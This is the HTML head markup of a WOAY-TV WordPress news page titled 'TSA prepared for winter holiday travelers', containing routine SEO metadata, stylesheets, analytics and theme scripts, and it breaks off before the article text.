<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]-->
<head>
    
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="https://woay.com/xmlrpc.php" />
    <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

<!-- Google Tag Manager for WordPress by gtm4wp.com -->
<script data-cfasync="false" data-pagespeed-no-defer>
	var gtm4wp_datalayer_name = "dataLayer";
	var dataLayer = dataLayer || [];
</script>
<!-- End Google Tag Manager for WordPress by gtm4wp.com --><!-- Jetpack Site Verification Tags -->
<meta name="google-site-verification" content="q14y75cLpOhIz_aP013JQmPQ7MvFj6TPCEKI5BnUX0U" />
<link rel="icon" type="image/png" href="https://woay.com/wp-content/uploads/2020/03/WOAY-16-X-16.png"><link rel="apple-touch-icon" sizes="76x76" href="https://woay.com/wp-content/uploads/2020/03/WOAY-76-X-76.png"/><link rel="apple-touch-icon" sizes="120x120" href="https://woay.com/wp-content/uploads/2020/03/WOAY-120-X-120.png"/><link rel="apple-touch-icon" sizes="152x152" href="https://woay.com/wp-content/uploads/2020/03/WOAY-152-X-152.png"/><link rel="apple-touch-icon" sizes="114x114" href="https://woay.com/wp-content/uploads/2020/03/WOAY-114-X-114.png"/><link rel="apple-touch-icon" sizes="144x144" href="https://woay.com/wp-content/uploads/2020/03/WOAY-144-X-144.png"/><meta property="og:title" content="TSA prepared for winter holiday travelers"/>
<meta property="og:description" content="Oak Hill, WV (WOAY) - The Transportation Security Administration (TSA) expects airport security checkpoints nationwide to be busier this holiday travel season t"/>
<meta property="og:image" content="https://woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg"/>
<meta property="og:image:width" content="1280"/>
<meta property="og:image:height" content="720"/>
<meta property="og:image:type" content="image/jpeg"/>
<meta property="og:type" content="article"/>
<meta property="og:article:published_time" content="2022-12-20 11:11:03"/>
<meta property="og:article:modified_time" content="2022-12-20 11:11:03"/>
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="TSA prepared for winter holiday travelers"/>
<meta name="twitter:description" content="Oak Hill, WV (WOAY) - The Transportation Security Administration (TSA) expects airport security checkpoints nationwide to be busier this holiday travel season t"/>
<meta name="twitter:image" content="https://woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg"/>
<meta name="author" content="Brandy Lawrence"/>

	<!-- This site is optimized with the Yoast SEO plugin v19.11 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>TSA prepared for winter holiday travelers - WOAY-TV</title>
	<meta name="description" content="TSA expects airport security checkpoints nationwide to be busier this holiday travel season than last year" />
	<link rel="canonical" href="https://woay.com/tsa-prepared-for-winter-holiday-travelers/" />
	<meta property="og:url" content="https://woay.com/tsa-prepared-for-winter-holiday-travelers/" />
	<meta property="og:site_name" content="WOAY-TV" />
	<meta property="article:publisher" content="https://www.facebook.com/woaynewswatch/?fref=ts" />
	<meta property="article:published_time" content="2022-12-20T16:11:03+00:00" />
	<meta property="og:image" content="https://woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg" />
	<meta property="og:image:width" content="1280" />
	<meta property="og:image:height" content="720" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta name="author" content="Brandy Lawrence" />
	<meta name="twitter:creator" content="@WOAYNewsWatch" />
	<meta name="twitter:site" content="@WOAYNewsWatch" />
	<meta name="twitter:label1" content="Written by" />
	<meta name="twitter:data1" content="Brandy Lawrence" />
	<meta name="twitter:label2" content="Est. reading time" />
	<meta name="twitter:data2" content="5 minutes" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/#article","isPartOf":{"@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/"},"author":[{"@id":"https://woay.com/#/schema/person/a3e7195a760e96707ac784cf5d6cd8af"}],"headline":"TSA prepared for winter holiday travelers","datePublished":"2022-12-20T16:11:03+00:00","dateModified":"2022-12-20T16:11:03+00:00","mainEntityOfPage":{"@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/"},"wordCount":932,"publisher":{"@id":"https://woay.com/#organization"},"image":{"@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/#primaryimage"},"thumbnailUrl":"https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?fit=1280%2C720&ssl=1","articleSection":["Featured","National","News"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/","url":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/","name":"TSA prepared for winter holiday travelers - WOAY-TV","isPartOf":{"@id":"https://woay.com/#website"},"primaryImageOfPage":{"@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/#primaryimage"},"image":{"@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/#primaryimage"},"thumbnailUrl":"https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?fit=1280%2C720&ssl=1","datePublished":"2022-12-20T16:11:03+00:00","dateModified":"2022-12-20T16:11:03+00:00","description":"TSA expects airport security checkpoints nationwide to be busier this holiday travel season than last year","breadcrumb":{"@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://woay.com/tsa-prepared-for-winter-holiday-travelers/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/#primaryimage","url":"https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?fit=1280%2C720&ssl=1","contentUrl":"https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?fit=1280%2C720&ssl=1","width":1280,"height":720},{"@type":"BreadcrumbList","@id":"https://woay.com/tsa-prepared-for-winter-holiday-travelers/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://woay.com/"},{"@type":"ListItem","position":2,"name":"TSA prepared for winter holiday travelers"}]},{"@type":"WebSite","@id":"https://woay.com/#website","url":"https://woay.com/","name":"WOAY-TV","description":"Oak Hill, Beckley, and Bluefield&#039;s Choice for 4News Coverage","publisher":{"@id":"https://woay.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://woay.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://woay.com/#organization","name":"WOAY - TV","url":"https://woay.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://woay.com/#/schema/logo/image/","url":"https://i1.wp.com/woay.com/wp-content/uploads/2020/03/WOAY-76-X-76.png?fit=76%2C76&ssl=1","contentUrl":"https://i1.wp.com/woay.com/wp-content/uploads/2020/03/WOAY-76-X-76.png?fit=76%2C76&ssl=1","width":76,"height":76,"caption":"WOAY - TV"},"image":{"@id":"https://woay.com/#/schema/logo/image/"},"sameAs":["https://www.instagram.com/woaynewswatch/","https://www.linkedin.com/company/7082714?trk=tyah&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;trkInfo=clickedVertical:company,clickedEntityId:7082714,idx:1-1-1,tarId:1480531965479,tas:WOAY","https://www.youtube.com/channel/UCWxMcXSm9GIVIADBYoZ4dxQ","https://www.facebook.com/woaynewswatch/?fref=ts","https://twitter.com/WOAYNewsWatch"]},{"@type":"Person","@id":"https://woay.com/#/schema/person/a3e7195a760e96707ac784cf5d6cd8af","name":"Brandy Lawrence","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://woay.com/#/schema/person/image/6ed8595b05629c1df8e85d31b2b10f5f","url":"https://i0.wp.com/woay.com/wp-content/uploads/2022/07/profile-picture.webp?fit=96%2C96&ssl=1","contentUrl":"https://i0.wp.com/woay.com/wp-content/uploads/2022/07/profile-picture.webp?fit=96%2C96&ssl=1","caption":"Brandy Lawrence"},"url":"https://woay.com/author/blawrencewoay/"}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link rel='dns-prefetch' href='//i0.wp.com' />
<link rel="alternate" type="application/rss+xml" title="WOAY-TV &raquo; Feed" href="https://woay.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="WOAY-TV &raquo; Comments Feed" href="https://woay.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="WOAY-TV &raquo; TSA prepared for winter holiday travelers Comments Feed" href="https://woay.com/tsa-prepared-for-winter-holiday-travelers/feed/" />
		<!-- This site uses the Google Analytics by MonsterInsights plugin v8.10.1 - Using Analytics tracking - https://www.monsterinsights.com/ -->
							<script
				src="//www.googletagmanager.com/gtag/js?id=UA-122720309-1"  data-cfasync="false" data-wpfc-render="false" type="text/javascript" async></script>
			<script data-cfasync="false" data-wpfc-render="false" type="text/javascript">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</script>
				<!-- / Google Analytics by MonsterInsights -->
		<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/woay.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<style id='wp-block-library-inline-css' type='text/css'>
:root{--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,161;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (-webkit-min-device-pixel-ratio:2),(min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important}.screen-reader-text:focus{background-color:#ddd;clip:auto!important;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style*=border-top-color]){border-top-style:solid}html :where([style*=border-right-color]){border-right-style:solid}html :where([style*=border-bottom-color]){border-bottom-style:solid}html :where([style*=border-left-color]){border-left-style:solid}html :where([style*=border-width]){border-style:solid}html :where([style*=border-top-width]){border-top-style:solid}html :where([style*=border-right-width]){border-right-style:solid}html :where([style*=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}figure{margin:0 0 1em}
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='classic-theme-styles-css' href='https://c0.wp.com/c/6.1.1/wp-includes/css/classic-themes.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css' href='https://woay.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.6.4' type='text/css' media='all' />
<style id='extendify-gutenberg-patterns-and-templates-utilities-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='ppress-frontend-css' href='https://woay.com/wp-content/plugins/wp-user-avatar/assets/css/frontend.min.css?ver=4.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='ppress-flatpickr-css' href='https://woay.com/wp-content/plugins/wp-user-avatar/assets/flatpickr/flatpickr.min.css?ver=4.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='ppress-select2-css' href='https://woay.com/wp-content/plugins/wp-user-avatar/assets/select2/select2.min.css?ver=6.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-plugin-newsletter-css' href='https://woay.com/wp-content/plugins/td-newsletter/style.css?ver=12.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-plugin-multi-purpose-css' href='https://woay.com/wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=e815948e5c9ec5801de67b92a1d5a59fx' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='google-fonts-style-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A400%2C600%2C700%7CRoboto%3A400%2C500%2C700&#038;display=swap&#038;ver=12.1' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='evcal_google_fonts-css' href='//fonts.googleapis.com/css?family=Oswald%3A400%2C300%7COpen+Sans%3A700%2C400%2C400i%7CRoboto%3A700%2C400&#038;ver=6.1.1' type='text/css' media='screen' />
<link rel='stylesheet' id='evcal_cal_default-css' href='//woay.com/wp-content/plugins/eventON/assets/css/eventon_styles.css?ver=2.6.12' type='text/css' media='all' />
<link rel='stylesheet' id='evo_font_icons-css' href='//woay.com/wp-content/plugins/eventON/assets/fonts/font-awesome.css?ver=2.6.12' type='text/css' media='all' />
<link rel='stylesheet' id='eventon_dynamic_styles-css' href='//woay.com/wp-content/plugins/eventON/assets/css/eventon_dynamic_styles.css?ver=6.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='tablepress-default-css' href='https://woay.com/wp-content/tablepress-combined.min.css?ver=11' type='text/css' media='all' />
<link rel='stylesheet' id='tablepress-responsive-tables-css' href='https://woay.com/wp-content/plugins/tablepress-responsive-tables/css/tablepress-responsive.min.css?ver=1.8' type='text/css' media='all' />
<link rel='stylesheet' id='evo_el_styles-css' href='//woay.com/wp-content/plugins/eventon-event-lists/assets/el_styles.css?ver=6.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css' href='https://woay.com/wp-content/themes/Newspaper/style.css?ver=12.1' type='text/css' media='all' />
<style id='td-theme-inline-css' type='text/css'>
    
        @media (max-width: 767px) {
            .td-header-desktop-wrap {
                display: none;
            }
        }
        @media (min-width: 767px) {
            .td-header-mobile-wrap {
                display: none;
            }
        }
    
	
</style>
<link rel='stylesheet' id='td-theme-child-css' href='https://woay.com/wp-content/themes/Newspaper-child/style.css?ver=12.1c' type='text/css' media='all' />
<link rel='stylesheet' id='td-legacy-framework-front-style-css' href='https://woay.com/wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=e815948e5c9ec5801de67b92a1d5a59fx' type='text/css' media='all' />
<link rel='stylesheet' id='td-standard-pack-framework-front-style-css' href='https://woay.com/wp-content/plugins/td-standard-pack/Newspaper/assets/css/td_standard_pack_main.css?ver=48767bfdc5698c9103b4ef9b700012fd' type='text/css' media='all' />
<link rel='stylesheet' id='tdb_style_cloud_templates_front-css' href='https://woay.com/wp-content/plugins/td-cloud-library/assets/css/tdb_main.css?ver=87b3292f51aec51c00e6ce7db9b73ed1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/11.5.1/css/jetpack.css' type='text/css' media='all' />
<script type='text/javascript' id='jetpack_related-posts-js-extra'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/11.5.1/_inc/build/related-posts/related-posts.min.js' id='jetpack_related-posts-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.10.1' id='monsterinsights-frontend-script-js'></script>
<script data-cfasync="false" data-wpfc-render="false" type="text/javascript" id='monsterinsights-frontend-script-js-extra'>/* <![CDATA[ */
var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,pdf,ppt,zip,xls,docx,pptx,xlsx","inbound_paths":"[]","home_url":"https:\/\/woay.com","hash_tracking":"false","ua":"UA-122720309-1","v4_id":""};/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/wp-user-avatar/assets/flatpickr/flatpickr.min.js?ver=4.3.2' id='ppress-flatpickr-js'></script>
<script type='text/javascript' src='https://woay.com/wp-content/plugins/wp-user-avatar/assets/select2/select2.min.js?ver=4.3.2' id='ppress-select2-js'></script>

<!-- Google Analytics snippet added by Site Kit -->
<script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-122720309-1' id='google_gtagjs-js' async></script>
<script type='text/javascript' id='google_gtagjs-js-after'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["woay.com"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-122720309-1", {"anonymize_ip":true});
</script>

<!-- End Google Analytics snippet added by Site Kit -->
<link rel="https://api.w.org/" href="https://woay.com/wp-json/" /><link rel="alternate" type="application/json" href="https://woay.com/wp-json/wp/v2/posts/108441" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://woay.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://woay.com/wp-includes/wlwmanifest.xml" />
<link rel='shortlink' href='https://woay.com/?p=108441' />
<link rel="alternate" type="application/json+oembed" href="https://woay.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwoay.com%2Ftsa-prepared-for-winter-holiday-travelers%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://woay.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwoay.com%2Ftsa-prepared-for-winter-holiday-travelers%2F&#038;format=xml" />

<!-- This site is using AdRotate v5.9.1.1 to display their advertisements - https://ajdg.solutions/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-2 {  margin: 0 auto; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->

<meta name="generator" content="Site Kit by Google 1.88.0" />
	<style type=text/css>
	@keyframes marquee {
  0% {
    left: 100%;
  }
  100% {
    left: -50%; /* need to be negative */
  }
}
	#mar
    {
        display: block;
        position: relative;
        height: 50px;
		width: 100%;
		background: #000000;
		font-size: 100%;
		margin-left: 0px;
		margin-right: 0px;
		margin-top: 0px;
		margin-bottom: 0px;
        animation: marquee 20s linear infinite; 
}	
	</style><meta name="generator" content="Redux 4.3.20" />	<style>img#wpstats{display:none}</style>
		
<!-- Google Tag Manager for WordPress by gtm4wp.com -->
<!-- GTM Container placement set to footer -->
<script data-cfasync="false" data-pagespeed-no-defer type="text/javascript">
	var dataLayer_content = {"pagePostType":"post","pagePostType2":"single-post","pageCategory":["featured","national","news"],"pagePostAuthor":"Brandy Lawrence","gtm.whitelist":[],"gtm.blacklist":[]};
	dataLayer.push( dataLayer_content );
</script>
<script data-cfasync="false">
(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.'+'js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-K8BTK4Q');
</script>
<!-- End Google Tag Manager -->
<!-- End Google Tag Manager for WordPress by gtm4wp.com --><!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
        <script>
        window.tdb_globals = {"wpRestNonce":"2ba027fb4c","wpRestUrl":"https:\/\/woay.com\/wp-json\/","permalinkStructure":"\/%postname%\/","globalSettings":{"tdcSavingHistory":false},"isAjax":false,"isAdminBarShowing":false,"autoloadScrollPercent":50,"postAutoloadStatus":"off","origPostEditUrl":null};
    </script>
    
    <style id="tdb-global-colors">
        :root {--accent-color: #fff;}
    </style>
	
			<script>
				window.tdwGlobal = {"adminUrl":"https:\/\/woay.com\/wp-admin\/","wpRestNonce":"2ba027fb4c","wpRestUrl":"https:\/\/woay.com\/wp-json\/","permalinkStructure":"\/%postname%\/"};
			</script>
			    <script>
        window.tdaGlobal = {"adminUrl":"https:\/\/woay.com\/wp-admin\/","wpRestNonce":"2ba027fb4c","wpRestUrl":"https:\/\/woay.com\/wp-json\/","permalinkStructure":"\/%postname%\/","postId":108441};
    </script>
    
<!-- Google AdSense snippet added by Site Kit -->
<meta name="google-adsense-platform-account" content="ca-host-pub-2644536267352236">
<meta name="google-adsense-platform-domain" content="sitekit.withgoogle.com">
<!-- End Google AdSense snippet added by Site Kit -->


<!-- EventON Version -->
<meta name="generator" content="EventON 2.6.12" />

<link rel="amphtml" href="https://woay.com/tsa-prepared-for-winter-holiday-travelers/?amp">			<style type="text/css">
				/* If html does not have either class, do not show lazy loaded images. */
				html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image {
					display: none;
				}
			</style>
			<script>
				document.documentElement.classList.add(
					'jetpack-lazy-images-js-enabled'
				);
			</script>
		<meta name="generator" content="Powered by Slider Revolution 6.5.8 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." />

<!-- JS generated by theme -->

<script>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</script>


<!-- Header style compiled by theme -->

<style>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</style>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-122720309-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-122720309-1');
</script>

<div id="fb-root"></div>
<script async defer crossorigin="anonymous" src="https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v11.0&appId=860131081575718&autoLogAppEvents=1" nonce="4o7Tlfhf"></script><link rel="icon" href="https://i0.wp.com/woay.com/wp-content/uploads/2020/05/image.jpg?fit=32%2C32&#038;ssl=1" sizes="32x32" />
<link rel="icon" href="https://i0.wp.com/woay.com/wp-content/uploads/2020/05/image.jpg?fit=192%2C192&#038;ssl=1" sizes="192x192" />
<link rel="apple-touch-icon" href="https://i0.wp.com/woay.com/wp-content/uploads/2020/05/image.jpg?fit=180%2C180&#038;ssl=1" />
<meta name="msapplication-TileImage" content="https://i0.wp.com/woay.com/wp-content/uploads/2020/05/image.jpg?fit=270%2C270&#038;ssl=1" />
<script type="text/javascript">function setREVStartSize(e){
			//window.requestAnimationFrame(function() {				 
				window.RSIW = window.RSIW===undefined ? window.innerWidth : window.RSIW;	
				window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;	
				try {								
					var pw = document.getElementById(e.c).parentNode.offsetWidth,
						newh;
					pw = pw===0 || isNaN(pw) ? window.RSIW : pw;
					e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);
					e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw);
					e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh);
					e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh);
					e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide);
					e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide);
					e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0);		
					if(e.layout==="fullscreen" || e.l==="fullscreen") 						
						newh = Math.max(e.mh,window.RSIH);					
					else{					
						e.gw = Array.isArray(e.gw) ? e.gw : [e.gw];
						for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1];					
						e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) && e.el.length==0)? e.gh : e.el;
						e.gh = Array.isArray(e.gh) ? e.gh : [e.gh];
						for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1];
											
						var nl = new Array(e.rl.length),
							ix = 0,						
							sl;					
						e.tabw = e.tabhide>=pw ? 0 : e.tabw;
						e.thumbw = e.thumbhide>=pw ? 0 : e.thumbw;
						e.tabh = e.tabhide>=pw ? 0 : e.tabh;
						e.thumbh = e.thumbhide>=pw ? 0 : e.thumbh;					
						for (var i in e.rl) nl[i] = e.rl[i]<window.RSIW ? 0 : e.rl[i];
						sl = nl[0];									
						for (var i in nl) if (sl>nl[i] && nl[i]>0) { sl = nl[i]; ix=i;}															
						var m = pw>(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) / (e.gw[ix]);					
						newh =  (e.gh[ix] * m) + (e.tabh + e.thumbh);
					}
					var el = document.getElementById(e.c);
					if (el!==null && el) el.style.height = newh+"px";					
					el = document.getElementById(e.c+"_wrapper");
					if (el!==null && el) {
						el.style.height = newh+"px";
						el.style.display = "block";
					}
				} catch(e){
					console.log("Failure at Presize of Slider:" + e)
				}					   
			//});
		  };</script>
		<style type="text/css" id="wp-custom-css">
			/* Leveling out logo with banner */ 
.td-header-style-1 .td-header-sp-recs {
    margin: 18px 0 9px 0;
}

 /*centering post images*/
.td-post-featured-image{
	display: block;
    margin-left: auto;
    margin-right: auto;
	}

/*adding space to top and bottom of footer*/
.td-footer-wrapper.td-footer-container.td-container-wrap  {
	padding-top: 108px!important;
	padding-bottom: 128px!important;
}

/*Removing white line above footer content*/
.td-footer-bottom-full .td-container:before {
	display: none;
}


/*Removing footer background image on mobile*/
@media only screen and (max-width: 600px) {
	.td-footer-wrapper::before {
	background-image:none;
	}
}

/*School Closing Banner*/
.closings {
	background: yellow;
}

/*Weather Alerts Banner*/
.weather-alerts {
	background: blue;
	color: white;
}

/*ad banners*/

#adrotate_widgets-5 {
	display: none;
}
.page-id-231 #adrotate_widgets-5 {
	display: inline;
}


		</style>
		
<!-- Button style compiled by theme -->

<style>
